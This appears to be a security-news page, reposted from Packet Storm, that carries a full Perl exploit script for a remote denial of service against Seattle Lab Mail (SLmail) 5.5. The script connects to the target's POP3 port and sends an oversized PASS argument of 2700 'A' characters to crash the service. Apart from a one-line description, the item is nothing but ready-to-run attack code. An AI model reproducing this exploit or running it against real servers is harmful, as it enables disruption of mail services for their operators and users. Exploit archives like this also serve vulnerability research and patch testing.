Security
Headlines
HeadlinesLatestCVEs

Headline

Seattle Lab Mail 5.5 Denial Of Service

Seattle Lab Mail version 5.5 remote denial of service exploit.

Packet Storm
#dos
use IO::Socket;sub intro {    print "***************************************************\n";    print "*          Seattle Lab Mail (SLmail) 5.5          *\n";    print "*                                                 *\n";        print "*             Coded By Fernando Mengali           *\n";    print "*                                                 *\n";    print "*       POP3 'PASS' Denied of Service - DoS       *\n";    print "*                                                 *\n";    print "***************************************************\n";}intro();    if (!$ARGV[0] && !$ARGV[1]) {        print "\nUsage: $0 <ip> <username>\n";        exit(0);    }my $host = $ARGV[0];my $username = $ARGV[1];my $port = 110;my $payload  = "A" x 2700;    my $s = IO::Socket::INET->new(        PeerAddr => $host,        PeerPort => $port,        Proto    => 'tcp'    ) or die "Unable to connect: $!\n";    $s->recv(my $data, 1024);    # Grab banners (if any)    $s->send('USER ' . $username . "\r\n");    $s->recv(my $response, 1024);    $s->recv(my $data, 1024);    # Grab banners (if any)    $s->send('PASS ' . $payload . "\r\n");    $s->recv(my $response, 1024);        $s->send("QUIT\r\n");    $s->close();

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution